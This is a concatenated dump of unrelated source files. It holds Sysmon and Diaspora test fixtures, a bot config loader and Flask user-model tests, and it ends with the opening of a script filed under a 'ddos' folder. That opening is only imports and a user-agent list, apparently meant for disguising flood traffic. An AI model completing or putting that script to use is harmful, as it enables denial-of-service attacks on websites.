"EventData_Protocol": "tcp",
"EventData_Initiated": "True",
"EventData_SourceIsIpv6": "False",
"EventData_SourceIp": "192.168.191.148",
"EventData_SourceHostname": "DESKTOP-OALUEJ1.localdomain",
"EventData_SourcePort": "1735",
"EventData_SourcePortName": None,
"EventData_DestinationIsIpv6": "False",
"EventData_DestinationIp": "111.221.29.254",
"EventData_DestinationHostname": None,
"EventData_DestinationPort": "443",
"EventData_DestinationPortName": "https",
}
nodes = transformer.transform(event)
assert len(nodes) == 3
proc: Process = nodes[0]
address: IPAddress = nodes[2]
assert proc.connected_to[address]
assert address.ip_address == "111.221.29.254"
def test_network_connection_with_hostname(transformer):
event = {
"Provider_Name": "Microsoft-Windows-Sysmon",
"Provider_Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"Provider": None,
"EventID_Qualifiers": "",
"EventID": "3",
"Version": "5",
"Level": "4",
"Task": "3",
"Opcode": "0",
"Keywords": "0x8000000000000000",
"TimeCreated_SystemTime": "2015-10-08 14:14:14.747887",
"TimeCreated": None,
"EventRecordID": "990",
"Correlation_ActivityID": "",
"Correlation_RelatedActivityID": "",
"Correlation": None,
"Execution_ProcessID": "4072",
"Execution_ThreadID": "4620",
"Execution": None,
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "DESKTOP-OALUEJ1",
"Security_UserID": "S-1-5-18",
"Security": None,
"EventData_UtcTime": 1444328053,
"EventData_ProcessGuid": "{90e22fd2-8107-5615-0000-001090bd0100}",
"EventData_ProcessId": "1704",
"EventData_Image": "C:\\Windows\\System32\\svchost.exe",
"EventData_User": "NT AUTHORITY\\SYSTEM",
"EventData_Protocol": "tcp",
"EventData_Initiated": "True",
"EventData_SourceIsIpv6": "False",
"EventData_SourceIp": "192.168.191.148",
"EventData_SourceHostname": "DESKTOP-OALUEJ1.localdomain",
"EventData_SourcePort": "1735",
"EventData_SourcePortName": None,
"EventData_DestinationIsIpv6": "False",
"EventData_DestinationIp": "111.221.29.254",
"EventData_DestinationHostname": "google.com",
"EventData_DestinationPort": "443",
"EventData_DestinationPortName": "https",
}
nodes = transformer.transform(event)
assert len(nodes) == 4
proc: Process = nodes[0]
address: IPAddress = nodes[2]
domain: Domain = nodes[3]
assert address in proc.connected_to
assert {"timestamp": 1444328053} in proc.connected_to[address]
assert address in domain.resolves_to
assert address.ip_address == "111.221.29.254"
def test_filecreate_event(transformer):
event = {
"Provider_Name": "Microsoft-Windows-Sysmon",
"Provider_Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"Provider": None,
"EventID_Qualifiers": "",
"EventID": "11",
"Version": "2",
"Level": "4",
"Task": "11",
"Opcode": "0",
"Keywords": "0x8000000000000000",
"TimeCreated_SystemTime": "2017-09-24 20:54:55.222649",
"TimeCreated": None,
"EventRecordID": "16",
"Correlation_ActivityID": "",
"Correlation_RelatedActivityID": "",
"Correlation": None,
"Execution_ProcessID": "1812",
"Execution_ThreadID": "4000",
"Execution": None,
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "DESKTOP-2C3IQHO",
"Security_UserID": "S-1-5-18",
"Security": None,
"EventData_UtcTime": 1506300895,
"EventData_ProcessGuid": "{0ad3e319-1b11-59c8-0000-0010054f3100}",
"EventData_ProcessId": "3344",
"EventData_Image": "C:\\Windows\\system32\\msiexec.exe",
"EventData_TargetFilename": "C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe",
"EventData_CreationUtcTime": "2017-09-24 20:54:55.023",
}
nodes = transformer.transform(event)
assert len(nodes) == 3
proc: Process = nodes[0]
written: File = nodes[2]
assert proc.accessed[written]
assert written.file_name == "splunkd.exe"
@pytest.mark.parametrize(
"event_type,edge_type",
[
("SetValue", "changed_value"),
("DeleteValue", "deleted_value"),
("CreateKey", "created_key"),
("DeleteKey", "deleted_key"),
],
)
def test_registry(transformer, event_type, edge_type):
event = {
"Provider_Name": "Microsoft-Windows-Sysmon",
"Provider_Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"Provider": None,
"EventID_Qualifiers": "",
"EventID": "13",
"Version": "2",
"Level": "4",
"Task": "13",
"Opcode": "0",
"Keywords": "0x8000000000000000",
"TimeCreated_SystemTime": "2017-09-24 20:54:56.862953",
"TimeCreated": None,
"EventRecordID": "56",
"Correlation_ActivityID": "",
"Correlation_RelatedActivityID": "",
"Correlation": None,
"Execution_ProcessID": "1812",
"Execution_ThreadID": "4000",
"Execution": None,
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "DESKTOP-2C3IQHO",
"Security_UserID": "S-1-5-18",
"Security": None,
"EventData_EventType": event_type,
"EventData_UtcTime": 1506300896,
"EventData_ProcessGuid": "{0ad3e319-0c16-59c8-0000-0010d47d0000}",
"EventData_ProcessId": "532",
"EventData_Image": "C:\\Windows\\system32\\services.exe",
"EventData_TargetObject": "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Services\\splunkdrv\\Start",
"EventData_Details": "DWORD (0x00000003)",
}
nodes = transformer.transform(event)
assert len(nodes) == 3
proc: Process = nodes[0]
key: RegistryKey = nodes[2]
assert key in getattr(proc, edge_type)
if event_type == "SetValue":
assert {"value": "DWORD (0x00000003)", "timestamp": 1506300896} in getattr(proc, edge_type)[
key
]
else:
assert {"timestamp": 1506300896} in getattr(proc, edge_type)[key]
assert key.key == "Start"
| 36.702786 | 134 | 0.614677 |
005c863066fbf7b7841f3ce091c08c4f62225dd9 | 10,530 | py | Python | federation/tests/fixtures/payloads/diaspora.py | hoseinfzad/federation | a73c6d8fbd3cc13b48109467072763c4ca082116 | [
"BSD-3-Clause"
] | null | null | null | federation/tests/fixtures/payloads/diaspora.py | hoseinfzad/federation | a73c6d8fbd3cc13b48109467072763c4ca082116 | [
"BSD-3-Clause"
] | null | null | null | federation/tests/fixtures/payloads/diaspora.py | hoseinfzad/federation | a73c6d8fbd3cc13b48109467072763c4ca082116 | [
"BSD-3-Clause"
] | null | null | null | DIASPORA_PUBLIC_PAYLOAD = """<?xml version='1.0' encoding='UTF-8'?>
<me:env xmlns:me="http://salmon-protocol.org/ns/magic-env">
<me:encoding>base64url</me:encoding>
<me:alg>RSA-SHA256</me:alg>
<me:data type="application/xml">PHN0YXR1c19tZXNzYWdlPjxmb28-YmFyPC9mb28-PC9zdGF0dXNfbWVzc2FnZT4=</me:data>
<me:sig key_id="Zm9vYmFyQGV4YW1wbGUuY29t">Cmk08MR4Tp8r9eVybD1hORcR_8NLRVxAu0biOfJbkI1xLx1c480zJ720cpVyKaF9""" \
"""CxVjW3lvlvRz5YbswMv0izPzfHpXoWTXH-4UPrXaGYyJnrNvqEB2UWn4iHKJ2Rerto8sJY2b95qbXD6Nq75EoBNub5P7DYc16ENhp3""" \
"""8YwBRnrBEvNOewddpOpEBVobyNB7no_QR8c_xkXie-hUDFNwI0z7vax9HkaBFbvEmzFPMZAAdWyjxeGiWiqY0t2ZdZRCPTezy66X6Q0""" \
"""qc4I8kfT-Mt1ctjGmNMoJ4Lgu-PrO5hSRT4QBAVyxaog5w-B0PIPuC-mUW5SZLsnX3_ZuwJww==</me:sig>
</me:env>
"""
DIASPORA_RESHARE_PAYLOAD = """<?xml version="1.0" encoding="UTF-8"?>
<me:env xmlns:me="http://salmon-protocol.org/ns/magic-env">
<me:data type="application/xml">PHN0YXR1c19tZXNzYWdlPgogIDxhdXRob3I-YXJ0c291bmQyQGRpYXNwLmV1PC9hdXRob3I-CiAgPGd1aWQ-NjI2NGNjNzAyOGM5MDEzNzQyODk0MDYxODYyYjhlN2I8L2d1aWQ-CiAgPGNyZWF0ZWRfYXQ-MjAxOS0wMy0xNFQyMDo1NToxMlo8L2NyZWF0ZWRfYXQ-CiAgPHB1YmxpYz50cnVlPC9wdWJsaWM-CiAgPHRleHQ-KipQbGVhc2Ugc3RheSBvZmYgdGhlIGdyYXNzIC4uLiBvcioqJiN4RDsKIVtdKGh0dHBzOi8vNjYubWVkaWEudHVtYmxyLmNvbS9kNGViMTMyMTZlZWY5ODE1ZjMzNTBhZDk1OTk5MmYxYy90dW1ibHJfcG80aXRjNzJKbjF5M3F1d25vMV81MDAuanBnKSYjeEQ7CiNzdGF5b2ZmPC90ZXh0Pgo8L3N0YXR1c19tZXNzYWdlPg==</me:data>
<me:encoding>base64url</me:encoding>
<me:alg>RSA-SHA256</me:alg>
<me:sig key_id="YXJ0c291bmQyQGRpYXNwLmV1">VWvuHE-HNgQGoCUqlNOEzl4qmrW3hl5qv4CwFu3-WXHeaB2ULGNDDbqO2sWE5R4TFjT-3WNLyma1QnL3dnozmnzdUT1DnL_Il2BwTTEUa3qHl1qaepikPWF_VKDTez-NJUzQCOFGENZcBSTfBy7yP0dErHhewaLXcXg37nCLyTN2elftE7x80BDXMZouApIMht2NvSwH91tIRw474Tuce2316JtVEdGhiGgzZ5iIF7BycUKw4Redxdc2RPvgJNWWqvgO6jYyc7rgzRtj1a_K7gA30Y280k6DkwNut8tCcUqU1FCN5AWT2S_vF8DIG3MWEBtqs7lDxDcjKBcQsXS9IY9sSwKr7kfT6wh6weHr2EbBv9ZPtbEL3_PY_orGLoz7MeJrO9bY2K59SptAs66esNJaqtQvlnbYXB8i6xLLWsTBc9t9WEx1EsBzLN5gak58evUoQVtVXQZ2kdR_rYR0U1dhVDWihL2fc_x7dkR2W8QTZKXPbdQwfday6msSOqQLWQ7NzJTh5djvkapY6Clu-ka_mMi7Avm0bzK5bEoGVUQidRM6Gq_e6hoPvq5J3-0SyAacQvP1sa9XEMHhvdumlnFPuwrcLHRb2utWlUS2L5BjXSlOt-k-HhSXFi5ClxFJL_-LqPeMOgCS07ogfeN_ZHfwNTMDdToVkBPi11sM0PY=</me:sig>
</me:env>
"""
DIASPORA_ENCRYPTED_PAYLOAD = """{
"aes_key": "...",
"encrypted_magic_envelope": "..."
}
"""
DIASPORA_POST_SIMPLE = """
<status_message>
<text>((status message))</text>
<guid>((guidguidguidguidguidguidguid))</guid>
<author>alice@alice.diaspora.example.org</author>
<public>false</public>
<created_at>2011-07-20T01:36:07Z</created_at>
<provider_display_name>Socialhome</provider_display_name>
</status_message>
"""
DIASPORA_POST_SIMPLE_WITH_MENTION = """
<status_message>
<text>((status message)) @{Jason Robinson 🐍🍻; jaywink@jasonrobinson.me}</text>
<guid>((guidguidguidguidguidguidguid))</guid>
<author>alice@alice.diaspora.example.org</author>
<public>false</public>
<created_at>2011-07-20T01:36:07Z</created_at>
<provider_display_name>Socialhome</provider_display_name>
</status_message>
"""
DIASPORA_POST_WITH_PHOTOS = """
<status_message>
<text>((status message))</text>
<guid>((guidguidguidguidguidguidguid))</guid>
<author>alice@alice.diaspora.example.org</author>
<public>false</public>
<created_at>2011-07-20T01:36:07Z</created_at>
<provider_display_name>Socialhome</provider_display_name>
<photo>
<guid>((guidguidguidguidguidguidguif))</guid>
<author>alice@alice.diaspora.example.org</author>
<public>false</public>
<created_at>2011-07-20T01:36:07Z</created_at>
<remote_photo_path>https://alice.diaspora.example.org/uploads/images/</remote_photo_path>
<remote_photo_name>1234.jpg</remote_photo_name>
<text/>
<status_message_guid>((guidguidguidguidguidguidguid))</status_message_guid>
<height>120</height>
<width>120</width>
</photo>
</status_message>
"""
DIASPORA_POST_INVALID = """
<status_message>
<text>((status message))</text>
<author>alice@alice.diaspora.example.org</author>
<public>false</public>
<created_at>2011-07-20T01:36:07Z</created_at>
<provider_display_name>Socialhome</provider_display_name>
</status_message>
"""
DIASPORA_POST_COMMENT = """
<comment>
<guid>((guidguidguidguidguidguid))</guid>
<parent_guid>((parent_guidparent_guidparent_guidparent_guid))</parent_guid>
<author_signature>((base64-encoded data))</author_signature>
<text>((text))</text>
<author>alice@alice.diaspora.example.org</author>
<author_signature>((signature))</author_signature>
</comment>
"""
DIASPORA_POST_COMMENT_NESTED = """
<comment>
<guid>((guidguidguidguidguidguid))</guid>
<parent_guid>((parent_guidparent_guidparent_guidparent_guid))</parent_guid>
<thread_parent_guid>((threadparentguid))</thread_parent_guid>
<author_signature>((base64-encoded data))</author_signature>
<text>((text))</text>
<author>alice@alice.diaspora.example.org</author>
<author_signature>((signature))</author_signature>
</comment>
"""
DIASPORA_POST_LIKE = """
<like>
<parent_type>Post</parent_type>
<guid>((guidguidguidguidguidguid))</guid>
<parent_guid>((parent_guidparent_guidparent_guidparent_guid))</parent_guid>
<author_signature>((base64-encoded data))</author_signature>
<positive>true</positive>
<author>alice@alice.diaspora.example.org</author>
<author_signature>((signature))</author_signature>
</like>
"""
DIASPORA_PROFILE = """
<profile>
<author>bob@example.com</author>
<first_name>Bob</first_name>
<last_name>Bobertson</last_name>
<image_url>https://example.com/uploads/images/thumb_large_c833747578b5.jpg</image_url>
<image_url_small>https://example.com/uploads/images/thumb_small_c8b147578b5.jpg</image_url_small>
<image_url_medium>https://example.com/uploads/images/thumb_medium_c8b1aab04f3.jpg</image_url_medium>
<gender></gender>
<bio>A cool bio</bio>
<location>Helsinki</location>
<searchable>true</searchable>
<nsfw>false</nsfw>
<tag_string>#socialfederation #federation</tag_string>
</profile>
"""
DIASPORA_PROFILE_FIRST_NAME_ONLY = """
<profile>
<author>bob@example.com</author>
<first_name>Bob</first_name>
<last_name></last_name>
<image_url>https://example.com/uploads/images/thumb_large_c833747578b5.jpg</image_url>
<image_url_small>https://example.com/uploads/images/thumb_small_c8b147578b5.jpg</image_url_small>
<image_url_medium>https://example.com/uploads/images/thumb_medium_c8b1aab04f3.jpg</image_url_medium>
<gender></gender>
<bio>A cool bio</bio>
<location>Helsinki</location>
<searchable>true</searchable>
<nsfw>false</nsfw>
<tag_string>#socialfederation #federation</tag_string>
</profile>
"""
DIASPORA_PROFILE_EMPTY_TAGS = """
<profile>
<author>bob@example.com</author>
<first_name>Bob</first_name>
<last_name>Bobertson</last_name>
<image_url>https://example.com/uploads/images/thumb_large_c833747578b5.jpg</image_url>
<image_url_small>https://example.com/uploads/images/thumb_small_c8b147578b5.jpg</image_url_small>
<image_url_medium>https://example.com/uploads/images/thumb_medium_c8b1aab04f3.jpg</image_url_medium>
<gender></gender>
<bio>A cool bio</bio>
<location>Helsinki</location>
<searchable>true</searchable>
<nsfw>false</nsfw>
<tag_string/>
</profile>
"""
DIASPORA_RETRACTION = """
<retraction>
<author>bob@example.com</author>
<target_guid>xxxxxxxxxxxxxxxx</target_guid>
<target_type>Post</target_type>
</retraction>
"""
DIASPORA_CONTACT = """
<contact>
<author>alice@example.com</author>
<recipient>bob@example.org</recipient>
<following>true</following>
<sharing>true</sharing>
</contact>
"""
DIASPORA_RESHARE = """
<reshare>
<author>alice@example.org</author>
<guid>a0b53e5029f6013487753131731751e9</guid>
<created_at>2016-07-12T00:36:42Z</created_at>
<root_author>bob@example.com</root_author>
<root_guid>a0b53bc029f6013487753131731751e9</root_guid>
<text></text>
</reshare>
"""
DIASPORA_RESHARE_WITH_EXTRA_PROPERTIES = """
<reshare>
<author>alice@example.org</author>
<guid>a0b53e5029f6013487753131731751e9</guid>
<created_at>2016-07-12T00:36:42Z</created_at>
<provider_display_name/>
<root_author>bob@example.com</root_author>
<root_guid>a0b53bc029f6013487753131731751e9</root_guid>
<public>true</public>
<raw_content>Important note here</raw_content>
<entity_type>Comment</entity_type>
</reshare>
"""
DIASPORA_WEBFINGER_JSON = """{
"subject": "acct:alice@example.org",
"links": [
{
"rel": "http://microformats.org/profile/hcard",
"type": "text/html",
"href": "https://example.org/hcard/users/7dba7ca01d64013485eb3131731751e9"
},
{
"rel": "http://joindiaspora.com/seed_location",
"type": "text/html",
"href": "https://example.org/"
}
]
}
"""
DIASPORA_HOSTMETA = """<?xml version="1.0" encoding="UTF-8"?>
<XRD xmlns="http://docs.oasis-open.org/ns/xri/xrd-1.0">
<Link rel="lrdd" template="https://example.com/webfinger?q={uri}" type="application/xrd+xml"/>
</XRD>
"""
DIASPORA_WEBFINGER = """<?xml version="1.0" encoding="UTF-8"?>
<XRD xmlns="http://docs.oasis-open.org/ns/xri/xrd-1.0">
<Subject>acct:user@server.example</Subject>
<Alias>https://server.example/people/0123456789abcdef</Alias>
<Link href="https://server.example/hcard/users/0123456789abcdef" rel="http://microformats.org/profile/hcard" type="text/html"/>
<Link href="https://server.example" rel="http://joindiaspora.com/seed_location" type="text/html"/>
<Link href="0123456789abcdef" rel="http://joindiaspora.com/guid" type="text/html"/>
<Link href="https://server.example/u/user" rel="http://webfinger.net/rel/profile-page" type="text/html"/>
<Link href="https://server.example/public/user.atom" rel="http://schemas.google.com/g/2010#updates-from" type="application/atom+xml"/>
<Link href="QUJDREVGPT0=" rel="diaspora-public-key" type="RSA"/>
</XRD>
"""
| 42.804878 | 737 | 0.718803 |
7d95f74f5697483bec6bdddee19240a1191f8a4d | 4,961 | py | Python | lib/config.py | qvant/idle_rpg_bot | a9090568383de8250d9a84a0b459fb764ee87892 | [
"MIT"
] | null | null | null | lib/config.py | qvant/idle_rpg_bot | a9090568383de8250d9a84a0b459fb764ee87892 | [
"MIT"
] | null | null | null | lib/config.py | qvant/idle_rpg_bot | a9090568383de8250d9a84a0b459fb764ee87892 | [
"MIT"
] | null | null | null | import codecs
import datetime
import json
from .consts import LOG_CONFIG
from .security import is_password_encrypted, encrypt_password, decrypt_password
from .utility import get_logger
CONFIG_PARAM_LOG_LEVEL = "LOG_LEVEL"
CONFIG_PARAM_QUEUE_PASSWORD = "QUEUE_PASSWORD"
CONFIG_PARAM_QUEUE_USER = "QUEUE_USER"
CONFIG_PARAM_QUEUE_HOST = "QUEUE_HOST"
CONFIG_PARAM_QUEUE_PORT = "QUEUE_PORT"
CONFIG_PARAM_NEW_PATH = "CONFIG_PATH"
CONFIG_PARAM_CONFIG_RELOAD_TIME = "CONFIG_RELOAD_TIME"
CONFIG_PARAM_BOT_SECRET = "BOT_SECRET"
CONFIG_PARAM_BOT_SERVER_NAME = "BOT_SERVER_NAME"
CONFIG_PARAM_ADMIN_LIST = "ADMIN_ACCOUNTS"
CONFIG_PARAM_DB_PORT = "DB_PORT"
CONFIG_PARAM_DB_NAME = "DB_NAME"
CONFIG_PARAM_DB_HOST = "DB_HOST"
CONFIG_PARAM_DB_USER = "DB_USER"
CONFIG_PARAM_DB_PASSWORD = "DB_PASSWORD"
class Config:
def __init__(self, file: str, reload: bool = False):
f = file
fp = codecs.open(f, 'r', "utf-8")
config = json.load(fp)
if not reload:
self.logger = get_logger(LOG_CONFIG, is_system=True)
self.logger.info("Read settings from {0}".format(file))
self.file_path = file
self.old_file_path = file
self.server_name = config.get(CONFIG_PARAM_BOT_SERVER_NAME)
self.queue_port = config.get(CONFIG_PARAM_QUEUE_PORT)
self.queue_host = config.get(CONFIG_PARAM_QUEUE_HOST)
self.queue_user = config.get(CONFIG_PARAM_QUEUE_USER)
self.queue_password = config.get(CONFIG_PARAM_QUEUE_PASSWORD)
self.secret = config.get(CONFIG_PARAM_BOT_SECRET)
if not is_password_encrypted(self.secret):
self.logger.info("Secret in plain text, start encryption")
new_password = encrypt_password(self.secret, self.server_name, self.queue_port)
self._save_secret(new_password)
self.logger.info("Secret was encrypted and saved")
else:
self.logger.info("Secret in cypher text, start decryption")
self.secret = decrypt_password(self.secret, self.server_name, self.queue_port)
self.logger.info("Secret was decrypted")
if not is_password_encrypted(self.queue_password):
self.logger.info("Password in plain text, start encryption")
new_password = encrypt_password(self.queue_password, self.server_name, self.queue_port)
self._save_password(new_password)
self.logger.info("Password was encrypted and saved")
else:
self.logger.info("Password in cypher text, start decryption")
self.queue_password = decrypt_password(self.queue_password, self.server_name, self.queue_port)
self.logger.info("Password was decrypted")
self.db_name = config.get(CONFIG_PARAM_DB_NAME)
self.db_port = config.get(CONFIG_PARAM_DB_PORT)
self.db_host = config.get(CONFIG_PARAM_DB_HOST)
self.db_user = config.get(CONFIG_PARAM_DB_USER)
self.db_password_read = config.get(CONFIG_PARAM_DB_PASSWORD)
if is_password_encrypted(self.db_password_read):
self.logger.info("DB password encrypted, do nothing")
self.db_password = decrypt_password(self.db_password_read, self.server_name, self.db_port)
else:
self.logger.info("DB password in plain text, start encrypt")
password = encrypt_password(self.db_password_read, self.server_name, self.db_port)
self._save_db_password(password)
self.logger.info("DB password encrypted and save back in config")
self.db_password = self.db_password_read
self.log_level = config.get(CONFIG_PARAM_LOG_LEVEL)
self.admin_list = config.get(CONFIG_PARAM_ADMIN_LIST)
self.logger.setLevel(self.log_level)
if config.get(CONFIG_PARAM_NEW_PATH) is not None:
self.file_path = config.get(CONFIG_PARAM_NEW_PATH)
self.reload_time = config.get(CONFIG_PARAM_CONFIG_RELOAD_TIME)
self.next_reload = datetime.datetime.now()
self.reloaded = False
def _save_secret(self, password: str):
fp = codecs.open(self.file_path, 'r', "utf-8")
config = json.load(fp)
fp.close()
fp = codecs.open(self.file_path, 'w', "utf-8")
config[CONFIG_PARAM_BOT_SECRET] = password
json.dump(config, fp, indent=2)
fp.close()
def _save_password(self, password: str):
fp = codecs.open(self.file_path, 'r', "utf-8")
config = json.load(fp)
fp.close()
fp = codecs.open(self.file_path, 'w', "utf-8")
config[CONFIG_PARAM_QUEUE_PASSWORD] = password
json.dump(config, fp, indent=2)
fp.close()
def _save_db_password(self, password: str):
fp = codecs.open(self.file_path, 'r', "utf-8")
config = json.load(fp)
fp.close()
fp = codecs.open(self.file_path, 'w', "utf-8")
config[CONFIG_PARAM_DB_PASSWORD] = password
json.dump(config, fp, indent=2)
fp.close()
| 45.513761 | 106 | 0.689579 |
b0ba865f88c63ce8a7537fb97e810be5af74e908 | 7,292 | py | Python | tests/test_user_model.py | MK1230/blog_instance | 6bf50328909624fe58ccfe60971620ca4b142ecb | [
"MIT"
] | null | null | null | tests/test_user_model.py | MK1230/blog_instance | 6bf50328909624fe58ccfe60971620ca4b142ecb | [
"MIT"
] | 3 | 2020-03-24T15:28:48.000Z | 2021-02-02T21:41:35.000Z | tests/test_user_model.py | weqopy/blog_instance | 6bf50328909624fe58ccfe60971620ca4b142ecb | [
"MIT"
] | null | null | null | import unittest
import time
from datetime import datetime
from app import create_app, db
from app.models import User, Role, Permission, AnonymousUser, Follow
class UserModelTestCase(unittest.TestCase):
def setUp(self):
self.app = create_app('testing')
self.app_context = self.app.app_context()
self.app_context.push()
db.create_all()
def tearDown(self):
db.session.remove()
db.drop_all()
self.app_context.pop()
def test_password_setter(self):
u = User(password='cat')
self.assertTrue(u.password_hash is not None)
def test_no_password_getter(self):
u = User(password='cat')
with self.assertRaises(AttributeError):
u.password
def test_password_verification(self):
u = User(password='cat')
self.assertTrue(u.verify_password('cat'))
self.assertFalse(u.verify_password('dog'))
def test_password_salts_are_random(self):
u = User(password='cat')
u2 = User(password='cat')
self.assertFalse(u.password_hash == u2.password_hash)
def test_token_generate(self):
u = User(password='cat')
db.session.add(u)
db.session.commit()
token = u.generate_confirmation_token()
self.assertTrue(u.confirm(token))
def test_invalid_confirmation_token(self):
u1 = User(password='cat')
u2 = User(password='dog')
db.session.add(u1)
db.session.add(u2)
db.session.commit()
token = u1.generate_confirmation_token()
self.assertFalse(u2.confirm(token))
def test_expired_confirmation_token(self):
u = User(password='cat')
db.session.add(u)
db.session.commit()
token = u.generate_confirmation_token(1)
time.sleep(3)
self.assertFalse(u.confirm(token))
def test_valid_reset_token(self):
u = User(password='cat')
db.session.add(u)
db.session.commit()
token = u.generate_reset_token()
self.assertTrue(u.reset_password(token, 'dog'))
self.assertTrue(u.verify_password('dog'))
def test_invalid_reset_token(self):
u1 = User(password='cat')
u2 = User(password='dog')
db.session.add(u1)
db.session.add(u2)
db.session.commit()
token = u1.generate_reset_token()
self.assertFalse(u2.reset_password(token, 'horse'))
self.assertTrue(u2.verify_password('dog'))
def test_valid_email_change_token(self):
u = User(email='john@example.com', password='cat')
db.session.add(u)
db.session.commit()
token = u.generate_change_email_token('susan@example.org')
self.assertTrue(u.change_email(token))
self.assertTrue(u.email == 'susan@example.org')
def test_invalid_email_change_token(self):
u1 = User(email='john@example.com', password='cat')
u2 = User(email='susan@example.org', password='dog')
db.session.add(u1)
db.session.add(u2)
db.session.commit()
token = u1.generate_change_email_token('david@example.net')
self.assertFalse(u2.change_email(token))
self.assertTrue(u2.email == 'susan@example.org')
def test_duplicate_email_change_token(self):
u1 = User(email='john@example.com', password='cat')
u2 = User(email='susan@example.org', password='dog')
db.session.add(u1)
db.session.add(u2)
db.session.commit()
token = u2.generate_change_email_token('john@example.com')
self.assertFalse(u2.change_email(token))
self.assertTrue(u2.email == 'susan@example.org')
def test_roles_and_permissions(self):
Role.insert_roles()
u = User(email='john@example.com', password='cat')
self.assertTrue(u.can(Permission.WRITE_ARTICLES))
self.assertFalse(u.can(Permission.MODERATE_COMMENTS))
def test_anonymous_user(self):
u = AnonymousUser()
self.assertFalse(u.can(Permission.FOLLOW))
def test_timestamps(self):
u = User(password='cat')
db.session.add(u)
db.session.commit()
self.assertTrue(
(datetime.utcnow() - u.member_since).total_seconds() < 3)
self.assertTrue(
(datetime.utcnow() - u.last_seen).total_seconds() < 3)
def test_ping(self):
u = User(password='cat')
db.session.add(u)
db.session.commit()
time.sleep(2)
last_seen_before = u.last_seen
u.ping()
self.assertTrue(u.last_seen > last_seen_before)
def test_gravatar(self):
u = User(email='john@example.com', password='cat')
with self.app.test_request_context('/'):
gravatar = u.gravatar()
gravatar_256 = u.gravatar(size=256)
gravatar_pg = u.gravatar(rating='pg')
gravatar_retro = u.gravatar(default='retro')
with self.app.test_request_context('/', base_url='https://example.com'):
gravatar_ssl = u.gravatar()
self.assertTrue('http://www.gravatar.com/avatar/' +
'd4c74594d841139328695756648b6bd6'in gravatar)
self.assertTrue('s=256' in gravatar_256)
self.assertTrue('r=pg' in gravatar_pg)
self.assertTrue('d=retro' in gravatar_retro)
self.assertTrue('https://secure.gravatar.com/avatar/' +
'd4c74594d841139328695756648b6bd6' in gravatar_ssl)
def test_follows(self):
u1 = User(email='john@example.com', password='cat')
u2 = User(email='susan@example.org', password='dog')
db.session.add(u1)
db.session.add(u2)
db.session.commit()
self.assertFalse(u1.is_following(u2))
self.assertFalse(u1.is_followed_by(u2))
timestamp_before = datetime.utcnow()
u1.follow(u2)
db.session.add(u1)
db.session.commit()
timestamp_after = datetime.utcnow()
self.assertTrue(u1.is_following(u2))
self.assertFalse(u1.is_followed_by(u2))
self.assertTrue(u2.is_followed_by(u1))
self.assertTrue(u1.followed.count() == 2)
self.assertTrue(u2.followers.count() == 2)
f = u1.followed.all()[-1]
self.assertTrue(f.followed == u2)
self.assertTrue(timestamp_before <= f.timestamp <= timestamp_after)
f = u2.followers.all()[-1]
self.assertTrue(f.follower == u1)
u1.unfollow(u2)
db.session.add(u1)
db.session.commit()
self.assertTrue(u1.followed.count() == 1)
self.assertTrue(u2.followers.count() == 1)
self.assertTrue(Follow.query.count() == 2)
u2.follow(u1)
db.session.add(u1)
db.session.add(u2)
db.session.commit()
db.session.delete(u2)
db.session.commit()
self.assertTrue(Follow.query.count() == 1)
def test_to_json(self):
u = User(email='john@example.com', password='cat')
db.session.add(u)
db.session.commit()
json_user = u.to_json()
expected_keys = ['url', 'username', 'member_since', 'last_seen',
'posts', 'followed_posts', 'post_count']
self.assertEqual(sorted(json_user.keys()), sorted(expected_keys))
self.assertTrue('api/v1.0/users/' in json_user['url'])
| 36.46 | 80 | 0.620817 |
b44747ffbd8ec85081e81b14bf8618f933aa7141 | 24,524 | py | Python | ddos/Zeus/ZeusCloryV2.py | mr-kritik/android_soft | f484895c72d140efcdab53e5777494de1515a4b1 | [
"Apache-2.0"
] | null | null | null | ddos/Zeus/ZeusCloryV2.py | mr-kritik/android_soft | f484895c72d140efcdab53e5777494de1515a4b1 | [
"Apache-2.0"
] | null | null | null | ddos/Zeus/ZeusCloryV2.py | mr-kritik/android_soft | f484895c72d140efcdab53e5777494de1515a4b1 | [
"Apache-2.0"
] | null | null | null | import random
import socket
import threading
import time
import os
useragents = [
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1',
'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
